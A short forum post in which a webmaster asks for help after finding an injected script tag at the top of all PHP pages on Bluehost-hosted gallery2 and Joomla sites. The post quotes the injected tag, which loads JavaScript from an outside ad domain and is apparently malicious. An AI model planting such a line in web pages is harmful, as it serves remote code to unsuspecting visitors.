I have many websites hosted on my account on Bluehost.com. Today I noticed that all the websites using PHP are having a weird script code in top of all the PHP webpages...I have installed gallery2 and joomla scripts on many websites.

The script code looks like this:
<script language="javascript" SRC="http://en.swfads.info/ads.js"></scr...
[PLEASE DON'T RUN THE ABOVE SCRIPT IN MICROSOFT IE AS IT MAY CONTAIN VIRUS OR SO]
My website URL is: http://gallery.mynameiskhan.info

I guess its a trojan attack...I have never faced this situation before...PLEASE advice me, how to remove this problem...???

When I open these PHP web pages through FTP then the code does not appear in any file...The code only appears when I open the website from some Internet Explorer...
